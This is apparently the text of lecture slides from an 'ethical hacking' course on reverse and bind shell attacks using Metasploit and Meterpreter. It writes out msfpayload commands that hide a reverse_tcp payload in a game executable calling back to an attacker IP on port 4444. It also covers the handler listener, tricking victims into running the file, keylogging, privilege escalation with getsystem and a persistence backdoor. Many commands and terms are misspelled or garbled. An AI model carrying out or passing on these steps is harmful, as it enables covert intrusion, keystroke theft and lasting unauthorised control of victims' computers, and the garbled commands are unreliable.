Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Cyber Security and Ethical hacking 16
1. Cyber Security & Ethical Hacking
By Mehedi Hasan
Lecture 16:
Reverse & Bind Shell Attacks
2. Meterpreter
Exploit:
Exploit is the process of taking advantage of security loophole on the
victim’s computer to gain illegal access.
Payloads:
Payload is the code that an attacker executes on the victims
computer once the system has been compromised.
Reverse Shell payload is an example.
Post Explanation Attack:
Once a system has been compromised the attacker executed against
it to control.
Listener:
Listener is code that runs on the attackers computer & wait for an
incoming connection from victims computer.
Poet Explanation Attacks
Important Terminology
3. Shell
A shell is a command line interface on a systemm that allows user to
interface with the system by sending it text commands. For example.
Command line prompt in windows and Terminal in Kali Linux.
4. Reverse Shell Attack
Reverse Shell attacks are attacks that force the victims computer to
connect back to the criminal and provide the criminal with remote shell
access to it.
Reverse shell attacks also have the additional advantage that they allow
the criminal to connect to the victim, even if the victim is behind a
firewall or has an internal IP address. This is true since in case of a
remote shell attack it is an outgoing connection instead of an incoming
connection.
Typically in a reverse shell attach, the criminal has to follow below
steps.
Step 1: Infect a regular file with a payload (msf)
Step 2: Open a port on criminals computer and listen for any incoming
connections from the victim (msf)
Step 3: Send the infected file to the victim and somehow get them
executed file (Social Engineering)
5. Meterpreter
• Introductions: Meterpreter is a tool which is a
part of Metasploit and allows the attacker to
communicate with the victims system after it
has been exploited. The best part about
meterpreter is that it will run from the
memory by attaching itself to a process on the
victims computer and does not create any file
on it.
Post Explanation Attacks
6. Merterpreter
Reverse Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect with exploit code and
payload. (exe, pdf, doc, xls)
Step 2: listener
Launce listener on your computer.
Step 3: Explanation
Send infected file to victim and somehow make execute.
Step 4: Shell Access
Wait for remote shell connection to get established
between victim and attacker.
Step 4: Post Explanation
Control the victims computer with post explanation script
7. Merterpreter
Post Explanation Attacks
Step 1: Backdoor file (msf)
msfpayload windows/meterpreter/reverse_tec
LHOST=192.168.100.15, LPORT=4444
>/root/desktop/nfs.exe
Step 2: Listener
use exploit/multi/handler
set payload windows/meterpreter/revers_tcp
set LHOST=192.168.100.15
exploit
Step 3: Explanation (Social Engineering)
Step 4: Shell Access
Get meterepreter shell access
Step 5: Post Explanation.
8. Merterpreter
Post Explanation Attacks
Different ways to get a Meterepreter Session
• Send to victim the infected file.
• Send to victim the infected PDF/Vulnerability in adobe acrobat on
victim
• Send a link to victim of a page that exploits a browser
Vulnerability.
• Send a link to victim of a webpage that exploit a JAVA
Vulnerability
9. Remote Shell Attack
Using an infected exe file
Require Techniques
• Victim is running windows 7
• Attacker has metasplait.
10. Merterpreter
Post Explanation Attacks
Step 1: Hide the reverse shell payload onto say a game like
NFS.exe. This reveres shell payload when executed on the
victims system will connect back to the attacker on port
4444 on the IP address 192.168.100.15
Msfpaylaod windows/mereterpreter/reverce_tcp
LHOST=192.168.100.15, LPORT=4444, >root/desktop/nfs.exe
Step 2: Start metasploit and type the following commands
to launch the multi handeler module and tell it which payload to
expect and on what port.
Use exploit/multi/handeler/reverse_tcp set lhost192.168.100.15
Step 3: Metasploit will now start the payload handler, wait for a
Reverse shell connection to get established from the victims machine
to the attackers on port 4444
11. Merterpreter
Post Explanation Attacks
Step 4: Somehow send the nfs.exe file to the victim and
fool the victim into executing it on the windows 7 system.
Step5: you have now successfully managed to connect to
The victims computer and a meterpreter session has been
Created between attacker and the victim. To double check,
type the sysinfo command.
Step 6: To get access to the shell prompt on the victims
computer, simply type the shell command: shell
Step 7: You can now browse the victims computer just as
if it were your own computer.
12. Post Exploitation Scripts
List of existing scripts available
http://dev.metasploit.com/redmine/projects/fr
amework/repository/shell-script/metrepreter
19. Meterpreter existing script
Migrating to some other process: migrate 912
Migrates to the process whose process is 912 in this case explore.exe.
Now toy can capture victims keystroke.
20. Meterpreter existing script
Start a keylogger on the victims computer
Run post/windows/capture/keylog_recorder
Starts kelogger on victims system and records all keystrokes
21. Meterpreter existing script
Start a Key logger on the victims computer.
Keyscan_start
Keyscan_dump
Keyscan_stop
Starts Keylogger on victims computer, Dumps key logger Buffer
and then stop key logger
24. Meterpreter existing script
Privilege escalation on the victims system
Getsystem
Tries previlege escalation to give you admin rights on victim system.
getuid
Tells you which user you are currently logged in as on victim system.
41. Remote Shell Attack
Once you have successfully got shell access to the victims computer,
ideally you want to leave a backdoor open if. Such that you will have
easy access to it in the future as well.
Meterpreter has a persistance.rb script that launches a meterpreter
Service on the victims computer, such that the attacker will be able to
access the victims computer even after it has been rebooted.
Once you have meterepreter shell access on victim, just type the below
Commands.
Persistance –h
Display all the various option avaiable.
Persistance –u –i5 –p 443 –r 192.168.100.1
Now even when the victim shuts down the computer whenever the
victim on again then you will have meterpreter shell access to the victim
43. Bind Shell VS Reverse Shell
Bind Shell Reveres Shell
It is possible to bind an application to a particular
port in such a way that whenever a user connects to
that port then the user gets shell access to the victim
It is possible to create a payload in such a way that,
when executed on the victim, it will connect to the
attacker and give shell access.
Attacker has to connect to the victim on the specified
port to get access to the shell.
Victim connects back to the attacker giving the
attacker a reverse shell code.
Easy to detect by firewall. Difficult to detect by firewall.
44. Merterpreter
Reverse Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect with exploit code and
payload. (exe, pdf, doc, xls)
Step 2: listener
Launce listener on your computer.
Step 3: Explanation
Send infected file to victim and somehow make execute.
Step 4: Shell Access
Wait for remote shell connection to get established
between victim and attacker.
Step 4: Post Explanation
Control the victims computer with post explanation script
45. Merterpreter
Bind Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infected with exploit code and payload. (exe, pdf,
doc, xls)
Step 2: Explanation
Send infected file to victim and somehow make execute.
Step 3: listener
Exploit binds itself to a particular port on the victim and listens for a
connection from the attacker.
Step 4: Shell Access
Attacker connect to the victim on the exploited port.
Step 5: Post Explanation
Control the victims computer with post explanation script and
commands.
48. Backdooring an EXE file with a payload
It is possible to backdoor an EXE file with a payload (reverse or bind
shell) with the help of mafpayloads
Msfpayload <payload> <LHOST=> <LPORT=> x –o <output file name>
For example:
Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12
LPORT=4444
X>/root/desktop/NFS.exe